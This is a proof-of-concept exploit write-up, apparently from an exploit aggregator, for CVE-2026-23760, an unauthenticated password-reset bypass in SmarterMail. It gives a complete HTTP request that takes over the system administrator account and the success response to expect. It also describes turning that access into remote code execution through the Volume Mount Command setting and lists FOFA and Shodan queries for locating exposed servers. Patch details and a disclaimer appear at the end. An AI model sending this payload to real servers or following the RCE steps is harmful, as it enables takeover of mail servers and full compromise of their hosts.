Share
## https://sploitus.com/exploit?id=6AB1A31B-2EA6-55C4-A4D6-43A5EB8881CF
# SmarterMail-CVE-2026-23760-poc

A proof-of-concept exploiting an authentication bypass via password reset API for the SmaretMail system administrator account.

# Vulnerability

The vulnerability exists due to an authentication bypass vulnerability in the password reset API. The `force-reset-password` endpoint permits anonymous requests and fails to verify the existing password or a reset token when resetting system administrator accounts.

- System administrator account takeover.
- A direct path to remote code execution via SmarterMail built-in functionality.

# Affected Versions

- SmarterTools SmarterMail versions prior to build 9511 

# Poc (by watchtowr labs)

The PoC is as simple as this:

```http
POST /api/v1/auth/force-reset-password HTTP/1.1
Host: xxxxxxx:9998
Content-Type: application/json
Content-Length: 145

{"IsSysAdmin":"true",
"OldPassword":"watever",
"Username":"admin",
"NewPassword":"NewPassword123!@#",
"ConfirmPassword": "NewPassword123!@#"}
```

You should receive a following response, which confirms that password had been successfully modified:

```json
{
"username":"",
"errorCode":"",
"errorData":"",
"debugInfo":"check1\\r\\ncheck2\\r\\ncheck3\\r\\ncheck4.2\\r\\ncheck5.2\\r\\ncheck6.2\\r\\ncheck7.2\\r\\ncheck8.2\\r\\n",
"success":true,
"resultCode":200
}
```

The only remaining requirement is knowing the username of the administrator account.

### ATO to RCE and beyond

Once authenticated as a system administrator, an attacker can:

- Navigate to `Settings -> Volume Mounts`.
- Create a new volume.
- Supply an arbitrary command in the `Volume Mount Command` field.

That command is executed by the underlying operating system. At that point, the attacker has achieved full remote code execution on the host.

https://labs.watchtowr.com/content/images/2026/01/image-17.png

When the configuration is saved, the supplied command is executed immediately.
# Automation

Nuclei-Template:

https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2026/CVE-2026-23760.yaml
# Into the wild


FOFA:

```
title='SmarterMail'
```

SHODAN:

```
html:'SmarterMail'
```

# Impact

An unauthenticated remote attacker can bypass authentication for the system administrator account and gain access. Once authenticated, they can complete a full remote code execution on the host.


CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N - 9.3:Critical

# Remediation & Mitigation

Update to the latest version : https://www.smartertools.com/smartermail/downloads

- Build 9511 (Jan 15, 2026)
- Build 9518 (Jan 22, 2026)

# References

- [SmarterMail Release Notes](https://www.smartertools.com/smartermail/release-notes/current)
- https://nvd.nist.gov/vuln/detail/CVE-2026-23760
- [watchTowr Blog and PoC](https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/)

# Disclaimer

This tool is for authorized security testing only. Unauthorized access to computer systems is illegal.